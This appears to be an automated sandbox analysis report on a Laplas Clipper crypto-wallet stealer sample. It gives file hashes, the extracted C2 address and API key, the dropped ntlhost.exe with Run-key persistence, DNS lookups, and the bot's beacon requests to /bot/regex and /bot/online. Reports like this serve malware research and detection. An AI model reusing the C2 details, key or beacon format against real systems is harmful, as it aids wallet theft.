Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230831-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05/09/2023, 19:51 UTC

General

  • Target

    f927d512c8ea36edb283f9e8d5e02ab4ea25b4b143ea605284a3506cd00b8b57_JC.exe

  • Size

    10.0MB

  • MD5

    197bebce417f5ba6c178ee34037fbdea

  • SHA1

    d9dc871f8e61e590115bae9b0d842fae0f8f52b9

  • SHA256

    f927d512c8ea36edb283f9e8d5e02ab4ea25b4b143ea605284a3506cd00b8b57

  • SHA512

    8cf7bde02dc86518d60f3836e86d3def9b9fcaf4242eaefccc6eaf2ffe61e7eaebc5d2ca114fc11169854726cce125e7f71cdb92214c1e248b4006afa2b223ad

  • SSDEEP

    49152:4EjwvlIKv05z+UERnIcYmWjc3Cdhu5E9UFiqeb0/B1Y4kIZxdez6LK+/BV6Cbfoq:OlhWzZ6hnEciqem

Malware Config

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f927d512c8ea36edb283f9e8d5e02ab4ea25b4b143ea605284a3506cd00b8b57_JC.exe (PID 4412)
    Command line: "C:\Users\Admin\AppData\Local\Temp\f927d512c8ea36edb283f9e8d5e02ab4ea25b4b143ea605284a3506cd00b8b57_JC.exe"
    Signatures: Adds Run key to start application; Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe (PID 1060, child of PID 4412)
      Command line: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      Signatures: Executes dropped EXE

Network

  • DNS lookups, all sent to 8.8.8.8:53, in the order the report lists them. Only the lpls.tuktuk.ug lookup is attributed to a process (ntlhost.exe); the PTR lookups are unattributed. "(none shown)" means the report records no answer.

    Query                          Type    Answer
    67.31.126.40.in-addr.arpa      IN PTR  (none shown)
    254.36.238.8.in-addr.arpa      IN PTR  (none shown)
    9.228.82.20.in-addr.arpa       IN PTR  (none shown)
    41.110.16.96.in-addr.arpa      IN PTR  a96-16-110-41.deploy.static.akamaitechnologies.com
    57.169.31.20.in-addr.arpa      IN PTR  (none shown)
    95.221.229.192.in-addr.arpa    IN PTR  (none shown)
    lpls.tuktuk.ug                 IN A    95.214.27.254   (ntlhost.exe)
    254.27.214.95.in-addr.arpa     IN PTR  (none shown)
    103.169.127.40.in-addr.arpa    IN PTR  (none shown)
    206.23.85.13.in-addr.arpa      IN PTR  (none shown)
    206.23.85.13.in-addr.arpa      IN PTR  (none shown; repeated query)
    254.210.247.8.in-addr.arpa     IN PTR  (none shown)
    1.202.248.87.in-addr.arpa      IN PTR  https-87-248-202-1.ams.llnw.net
    11.227.111.52.in-addr.arpa     IN PTR  (none shown)
    26.73.42.20.in-addr.arpa       IN PTR  (none shown)

  • HTTP requests by ntlhost.exe to lpls.tuktuk.ug (95.214.27.254:80); every request was answered HTTP/1.1 200 OK

    Date (GMT, from the response)   Request
    Tue, 05 Sep 2023 19:51:29       GET http://lpls.tuktuk.ug/bot/regex
    Tue, 05 Sep 2023 19:51:29       GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin
    Tue, 05 Sep 2023 19:52:30       GET http://lpls.tuktuk.ug/bot/regex
    Tue, 05 Sep 2023 19:52:31       GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin
    Tue, 05 Sep 2023 19:53:31       GET http://lpls.tuktuk.ug/bot/regex
    Tue, 05 Sep 2023 19:53:31       GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin

    The six exchanges differ only in the request line and the response Date header. Headers as recorded for the first pair:

    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip

    HTTP/1.1 200 OK
    Server: nginx/1.17.10 (Ubuntu)
    Date: Tue, 05 Sep 2023 19:51:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip

  • Connections summary (bytes sent/received and packet counts out/in as reported)

    Remote            Domain / query                 Proto  Process      Sent    Received  Pkts out/in
    95.214.27.254:80  lpls.tuktuk.ug                 http   ntlhost.exe  1.5kB   2.9kB     14/16
    8.8.8.8:53        67.31.126.40.in-addr.arpa      dns    -            71 B    157 B     1/1
    8.8.8.8:53        254.36.238.8.in-addr.arpa      dns    -            71 B    125 B     1/1
    8.8.8.8:53        9.228.82.20.in-addr.arpa       dns    -            70 B    156 B     1/1
    8.8.8.8:53        41.110.16.96.in-addr.arpa      dns    -            71 B    135 B     1/1
    8.8.8.8:53        57.169.31.20.in-addr.arpa      dns    -            71 B    157 B     1/1
    8.8.8.8:53        95.221.229.192.in-addr.arpa    dns    -            73 B    144 B     1/1
    8.8.8.8:53        lpls.tuktuk.ug                 dns    ntlhost.exe  60 B    76 B      1/1
    8.8.8.8:53        254.27.214.95.in-addr.arpa     dns    -            72 B    147 B     1/1
    8.8.8.8:53        103.169.127.40.in-addr.arpa    dns    -            73 B    147 B     1/1
    8.8.8.8:53        206.23.85.13.in-addr.arpa      dns    -            142 B   145 B     2/1
    8.8.8.8:53        254.210.247.8.in-addr.arpa     dns    -            72 B    126 B     1/1
    8.8.8.8:53        1.202.248.87.in-addr.arpa      dns    -            71 B    116 B     1/1
    8.8.8.8:53        11.227.111.52.in-addr.arpa     dns    -            72 B    158 B     1/1
    8.8.8.8:53        26.73.42.20.in-addr.arpa       dns    -            70 B    156 B     1/1

    The 95.214.27.254:80 connection carried the six HTTP requests listed above (three to /bot/regex, three to /bot/online), each answered 200. The lpls.tuktuk.ug DNS connection returned 95.214.27.254; the 206.23.85.13.in-addr.arpa query was sent twice and answered once.

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    720.0MB

    MD5

    29fa44cdeffc3c3b14d0e4fd203e0b1f

    SHA1

    f5c0f8d3f416a513303f83825ecd1151b97adce5

    SHA256

    5c2d102694bcf67bea0504a27d6983ca8baf44f0a5dd6a7ce7fbee9bd0be4be3

    SHA512

    cee9ccad50f31b0804bec519020b64de0830055ae9937b30c0140e34c4791cf1bb5e09421807afb8f9d11c6e485f330f3c0ed17b86e1cf7a23f0644ac2e2fcd4
